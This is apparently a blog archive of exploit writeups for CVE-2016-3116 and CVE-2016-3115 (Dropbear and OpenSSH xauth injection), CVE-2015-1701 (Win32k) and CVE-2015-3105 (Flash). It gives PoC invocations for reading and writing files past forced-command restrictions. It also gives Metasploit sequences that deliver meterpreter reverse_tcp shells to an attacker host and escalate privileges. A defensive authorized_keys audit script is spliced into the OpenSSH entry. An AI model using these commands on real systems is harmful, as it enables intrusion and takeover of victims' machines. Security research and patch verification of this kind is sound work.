Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2016-3116 Dropbear SSH forced-command and security bypass

Timeline :

Vulnerability discovered and reported to the vendor by tintinweb
Patch provided by the vendor on 2016-03-09
PoC and details provided by tintinweb on 2016-03-10

PoC provided by :

tintinweb

Reference(s) :

CVE-2016-3116

Affected version(s) :

All versions of dropbear SSH prior to 2016.72 with X11Forwarding enabled.

Tested on :

Ubuntu 15.10 with Dropbear server v2015.71

Description :

Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth.

Injection of xauth commands grants the ability to read arbitrary files under the authenticated user's privilege. Other xauth commands allow limited information leakage, file overwrite, port probing and generally expose xauth, which was not written with a hostile user in mind, as an attack surface.

xauth is run under the user's privilege, so this vulnerability offers no additional access to unrestricted accounts, but it could circumvent key or account restrictions such as sshd_config ForceCommand, authorized_keys command="..." or restricted shells.

Commands :

Create a shell (/bin/bash) user1:
- with SSH key or password authentication
- add a forced command in the authorized_keys file, e.g. command="whoami"

Normally only the command "whoami" is executed once SSH authentication succeeds.

Create a non-shell (/bin/false) user2

Start dropbear
dropbear -R -F -E -p 2222

Use the provided PoC Python script to connect to the vulnerable host:
python poc.py <host> <port> <username> <password or path_to_privkey>
For example: python poc.py 192.168.6.146 22 user1 test

The ".readfile" command allows reading files on the system
The ".writefile" command allows writing files on the system

CVE-2016-3115 OpenSSH forced-command and security bypass

Timeline :

Vulnerability discovered and reported to the vendor by tintinweb
Patch provided by the vendor on 2016-03-09
PoC and details provided by tintinweb on 2016-03-10

PoC provided by :

tintinweb

Reference(s) :

CVE-2016-3115

Affected version(s) :

All versions of OpenSSH prior to 7.2p2 with X11Forwarding enabled.

Tested on :

Ubuntu 15.10 with OpenSSH_6.9p1 Ubuntu-2, OpenSSL 1.0.2d 9 Jul 2015

Description :

Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth.

Injection of xauth commands grants the ability to read arbitrary files under the authenticated user's privilege. Other xauth commands allow limited information leakage, file overwrite, port probing and generally expose xauth, which was not written with a hostile user in mind, as an attack surface.

xauth is run under the user's privilege, so this vulnerability offers no additional access to unrestricted accounts, but it could circumvent key or account restrictions such as sshd_config ForceCommand, authorized_keys command="..." or restricted shells.
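Both the Dropbear and the OpenSSH descriptions hinge on the same configuration: a forced-command or otherwise restricted account that is still allowed to request X11 forwarding. The following audit script is an added example, not part of this post or of either project's code. It parses an sshd_config excerpt and an OpenSSH-style authorized_keys file, flags forced-command keys that can still request X11 forwarding while the server permits it, and prints the corrected key line. The sample config and key lines are constructed; only the global X11Forwarding setting is considered (Match blocks are not evaluated), which is an assumption of this example.

```python
"""Audit authorized_keys for forced-command keys that can still request X11
forwarding. Added example; not the advisory's PoC or either project's code."""

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def sshd_x11_enabled(config_text):
    """Global X11Forwarding value. sshd honours the first occurrence of a keyword
    and defaults to 'no'. Assumption: Match blocks are not evaluated here."""
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if parts[0].lower() == "match":
            break
        if len(parts) == 2 and parts[0].lower() == "x11forwarding":
            return parts[1].strip().lower() == "yes"
    return False


def split_options(field):
    """Split the comma-separated options field, keeping double-quoted values
    (with backslash escapes) intact, so command="echo \"a,b\"" stays one option."""
    opts, cur, in_quote, i = [], [], False, 0
    while i < len(field):
        c = field[i]
        if c == "\\" and in_quote and i + 1 < len(field):
            cur.append(field[i:i + 2])  # keep the escape verbatim
            i += 2
            continue
        if c == '"':
            in_quote = not in_quote
        elif c == "," and not in_quote:
            opts.append("".join(cur))
            cur = []
            i += 1
            continue
        cur.append(c)
        i += 1
    if cur:
        opts.append("".join(cur))
    return opts


def parse_authorized_keys_line(line):
    """Return (options, key_part) or None for blank/comment lines. Options, when
    present, precede the key type and end at the first unquoted whitespace."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.split(None, 1)[0].startswith(KEY_TYPE_PREFIXES):
        return [], line
    i, in_quote = 0, False
    while i < len(line):
        c = line[i]
        if c == "\\" and in_quote:
            i += 2
            continue
        if c == '"':
            in_quote = not in_quote
        elif c.isspace() and not in_quote:
            break
        i += 1
    return split_options(line[:i]), line[i:].strip()


def option_names(options):
    return [o.split("=", 1)[0].strip().lower() for o in options]


def key_allows_x11(options):
    """Per-key X11 decision, processed in order as sshd does: 'restrict' and
    'no-x11-forwarding' disable it, a later 'x11-forwarding' re-enables it."""
    allowed = True
    for name in option_names(options):
        if name in ("restrict", "no-x11-forwarding"):
            allowed = False
        elif name == "x11-forwarding":
            allowed = True
    return allowed


def audit(sshd_config, authorized_keys):
    """Line numbers of forced-command keys that may still request X11 forwarding."""
    if not sshd_x11_enabled(sshd_config):
        return []
    flagged = []
    for n, raw in enumerate(authorized_keys.splitlines(), 1):
        parsed = parse_authorized_keys_line(raw)
        if parsed and "command" in option_names(parsed[0]) and key_allows_x11(parsed[0]):
            flagged.append(n)
    return flagged


def harden_line(raw):
    """Append no-x11-forwarding to a flagged key line; appended last so it is
    processed after any earlier x11-forwarding option. Other lines unchanged."""
    parsed = parse_authorized_keys_line(raw)
    if not parsed:
        return raw
    options, key_part = parsed
    if "command" in option_names(options) and key_allows_x11(options):
        return ",".join(options + ["no-x11-forwarding"]) + " " + key_part
    return raw


# Constructed samples (not real keys or a real host's configuration).
SAMPLE_SSHD_CONFIG = """# constructed sshd_config excerpt
Port 22
X11Forwarding yes
PermitRootLogin no
"""

SAMPLE_AUTHORIZED_KEYS = """# constructed authorized_keys
command="whoami" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyOne user1@example
command="whoami",no-x11-forwarding ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyTwo user2@example
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABExampleKeyThree plain@example
restrict,command="/usr/bin/uptime" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyFour user4@example
restrict,x11-forwarding,command="echo \\"a,b\\"" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyFive user5@example
"""

if __name__ == "__main__":
    for n in audit(SAMPLE_SSHD_CONFIG, SAMPLE_AUTHORIZED_KEYS):
        print("line %d: forced-command key can request X11 forwarding" % n)
        print("  fix:", harden_line(SAMPLE_AUTHORIZED_KEYS.splitlines()[n - 1]))
```

On the constructed sample the script flags lines 2 and 6: the plain command= key and the key whose restrict was undone by a later x11-forwarding. The fix is appended as the last option because sshd processes options in order, so a trailing no-x11-forwarding wins regardless of what precedes it. Disabling X11Forwarding globally in sshd_config closes the same exposure for every account at once.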

Commands :

Create a shell (/bin/bash) user1:
- with SSH key or password authentication
- add a forced command in the authorized_keys file, e.g. command="whoami"

Normally only the command "whoami" is executed once SSH authentication succeeds.

Create a non-shell (/bin/false) user2

Use the provided PoC Python script to connect to the vulnerable host:
python poc.py <host> <port> <username> <password or path_to_privkey>
For example: python poc.py 192.168.6.146 22 user1 test

The ".readfile" command allows reading files on the system
The ".writefile" command allows writing files on the system

CVE-2015-1701 Windows ClientCopyImage Win32k Exploit

Timeline :

Vulnerability discovered being exploited in the wild by FireEye on 2015-04-13
Patch provided by the vendor via MS15-051 on 2015-05-12
PoC provided by hfiref0x on 2015-05-12
Metasploit PoC provided on 2015-06-03

PoC provided by :

Unknown
hfiref0x
OJ Reeves
Spencer McIntyre

Reference(s) :

CVE-2015-1701
MS15-051

Affected version(s) :

Windows Server 2003 Service Pack 2
Windows Vista Service Pack 2
Windows Server 2008 Service Pack 2
Windows 7 Service Pack 1

Tested on :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188 (CVE-2015-3105) for remote exploitation

Description :

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Commands :

Remote exploitation
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

Local privilege escalation
use exploit/windows/local/ms15_051_client_copy_image
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
set SESSION 1
run

getuid

CVE-2015-3105 Adobe Flash Player Drawing Fill Shader Memory Corruption

Timeline :

Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero
Patch provided by the vendor via APSB15-11 on 2015-06-09
Vulnerability discovered being exploited by exploit kits on 2015-06-16
Metasploit PoC provided on 2015-06-25

PoC provided by :

Chris Evans
Unknown
juan vazquez

Reference(s) :

CVE-2015-3105
APSB15-11

Affected version(s) :

Adobe Flash Player 16.0.0.305 and earlier versions
Adobe Flash Player 11.2.202.442 and earlier 11.x versions

Tested on :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188

Description :

This module exploits a memory corruption that occurs when a Shader is applied as a drawing fill, as exploited in the wild in June 2015. This module has been tested successfully on:

* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Linux Mint "Rebecca" (32-bit), Firefox 33.0 and Adobe Flash 11.2.202.460.

Commands :

use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo